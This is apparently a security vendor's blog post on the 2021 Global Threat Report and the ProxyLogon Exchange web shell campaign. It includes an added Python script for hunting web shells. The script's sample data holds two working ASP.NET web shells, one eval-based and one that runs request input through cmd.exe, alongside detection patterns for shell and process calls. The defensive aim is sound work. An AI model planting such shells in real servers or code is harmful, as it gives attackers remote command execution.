by Joe Hedegaard Ganly

Saepio Solutions Architect


The 2021 Global Threat Report Insights

Working in the solutions team at Saepio, I’m always amazed at the quantity and quality of intelligence and research that our vendor partners and customers alike conduct and share with the community. 2021 dealt a low blow to already exhausted incident response and forensics teams, still recovering from the myriad attacks of 2020. The Microsoft Exchange ProxyLogon campaign (CVE-2021-26855, chained with three further vulnerabilities) was a mass attack that left anyone running an on-premises Exchange server scrambling to mitigate the risk.

One of the defining features of this campaign was the relentless installation of web shells during initial exploitation, which left the door open for other attackers. In contrast to SolarWinds, which was highly targeted, the campaign against Exchange was broad and non-specific. Focused exploitation affected some organisations, but the web shells left behind on many servers led to further exploitation by eCrime groups in a separate wave of attacks.
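The practical follow-up to the paragraph above is a web shell hunt on any server that was exposed during the campaign. The script below is an added example, not code from the original post or from CrowdStrike: it walks a web root, scores ASP.NET files against a small set of indicators (server-side code that reads request input and evaluates it, spawns a process, or loads a decoded payload) and reports files at or above a threshold. The indicator list, weights, threshold and the sample files (including the directory names) are assumptions constructed for this example; a real hunt would add a comparison against a known-good baseline of file hashes and creation times.

```python
"""Score ASP.NET files for web shell indicators (added example, not from the original page)."""
import tempfile
from pathlib import Path
import re

# Indicator regexes and their weights. These are assumptions for this example,
# not a vendor signature set; tune them against your own baseline.
INDICATORS = [
    (re.compile(r'runat\s*=\s*"server"', re.I), 1),                                    # server-side code block
    (re.compile(r'\bRequest\s*(\[|\.Item\s*[\[(]|\.Form\b|\.QueryString\b)', re.I), 2),  # attacker-supplied input
    (re.compile(r'\beval\s*\(', re.I), 3),                                              # JScript eval of input
    (re.compile(r'System\.Diagnostics\.Process\b|\bProcess\.Start\s*\(', re.I), 3),     # spawning processes
    (re.compile(r'\bcmd\.exe\b|\bpowershell(\.exe)?\b', re.I), 2),                      # shell interpreters
    (re.compile(r'FromBase64String\s*\(', re.I), 2),                                    # decoding a staged payload
    (re.compile(r'Assembly\.Load\s*\(', re.I), 3),                                      # in-memory .NET loading
]
THRESHOLD = 4                      # assumption: score at which a file is reported
EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax"}


def score_content(text: str) -> int:
    """Sum the weight of every indicator that appears at least once in the file."""
    return sum(weight for pattern, weight in INDICATORS if pattern.search(text))


def hunt(root: str) -> list[tuple[str, int]]:
    """Return (relative path, score) for every ASP.NET file under root scoring >= THRESHOLD."""
    base = Path(root)
    hits = []
    for path in base.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        score = score_content(path.read_text(errors="replace"))
        if score >= THRESHOLD:
            hits.append((path.relative_to(base).as_posix(), score))
    return sorted(hits)


# Constructed sample web root: two legitimate pages and two shells. Paths are illustrative.
SAMPLE_FILES = {
    # Legitimate logon form: only the runat indicator fires (score 1).
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %><html><body><form runat="server">'
        '<asp:TextBox ID="username" runat="server" /></form></body></html>',
    # Legitimate page reading a query string: runat + Request (score 3, below threshold).
    "ecp/auth/TimeoutLogout.aspx":
        '<%@ Page Language="C#" %><script runat="server">'
        'void Page_Load(object s, EventArgs e) { string r = Request.QueryString["reason"]; }</script>',
    # One-line JScript shell that evals whatever the request supplies (score 5).
    "aspnet_client/system_web/help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pwd"],"unsafe");%>',
    # C# shell that runs a command through cmd.exe and echoes the output (score 8).
    "owa/auth/Current/themes/cmd.aspx":
        '<%@ Page Language="C#" %><script runat="server">'
        'void Page_Load(object s, EventArgs e) {'
        '  var p = new System.Diagnostics.Process();'
        '  p.StartInfo.FileName = "cmd.exe";'
        '  p.StartInfo.Arguments = "/c " + Request["c"];'
        '  p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true;'
        '  p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); }</script>',
}


def build_sample_tree() -> str:
    """Write the constructed sample files into a temporary web root and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return root


if __name__ == "__main__":
    for rel_path, score in hunt(build_sample_tree()):
        print(f"{score:2d}  {rel_path}")
```

Run it against a real web root with `hunt(r"C:\inetpub\wwwroot")` or the Exchange front-end directories; the threshold keeps ordinary pages that merely read request parameters out of the report, while anything that both takes input and executes it is surfaced for manual review.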

Cyber Threat Report Insights

CrowdStrike has observed ransomware operators leveraging both nation-state APT-style techniques and more traditional phishing and human-vulnerability exploits. CrowdStrike’s tracking of eCrime groups and their behaviours is a major feature of its Global Threat Report 2021 and we highly recommend digesting it. The insight into the behaviours and groups to be wary of is informative rather than sensationalised, which is useful when planning mitigation strategies at both a technological and a process level.

The high-level outcomes I took from it, and hope you will too, are:

  • How state-sponsored adversaries infiltrated networks to steal valuable data on vaccine research and government responses to the pandemic.
  • How criminal adversaries introduced new business models to expand their “big game hunting” ransomware activities — and made them even more potent with the addition of blackmail and extortion techniques.
  • How both eCrime and targeted intrusion adversaries stepped up their development efforts, deploying a variety of inventive new methods to evade detection and confound defenders.

Crucial Takeaways

If you can’t see it, you can’t protect it. For security teams operating in today’s environment, visibility and speed are critical for blocking attackers that have the capability and intent to steal data and disrupt operations. Security teams must understand that it is their responsibility to secure their cloud environments, just as they would on-premises systems. They must establish consistent visibility for all environments and proactively address potential vulnerabilities before they can be leveraged by attackers.

Protect identities and access. Organisations must treat multifactor authentication (MFA) on all public-facing employee services and portals as mandatory. In addition to MFA, a robust privileged access management (PAM) process will limit the damage adversaries can do if they get in and reduce the likelihood of lateral movement. Finally, Zero Trust solutions should be implemented to compartmentalise and restrict data access, reducing the potential damage from unauthorised access to sensitive information.


Figure: The eCrime Ecosystem (an extract from the CrowdStrike 2021 Global Threat Report).